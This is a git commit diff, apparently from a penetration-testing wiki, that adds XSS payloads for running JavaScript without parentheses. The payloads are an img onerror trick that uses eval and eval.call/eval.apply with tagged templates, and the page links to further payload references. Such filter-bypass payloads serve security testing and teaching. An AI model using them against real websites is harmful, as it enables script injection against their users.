GitBook: [master] one page modified

This commit is contained in:
CPol 2021-06-03 12:18:07 +00:00 committed by gitbook-bot
parent d0a6c56d6b
commit f9c6a7926f
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 3 additions and 0 deletions

View File

@ -453,8 +453,11 @@ atob("dGhpc2lzYXN0cmluZw==")
```javascript
alert`1`
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
eval.call`${'alert\x2823\x29'}`
eval.apply`${[`alert\x2823\x29`]}`
```
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
#### JavaScript comments \(from [JavaScript Comments](./#javascript-comments) trick\)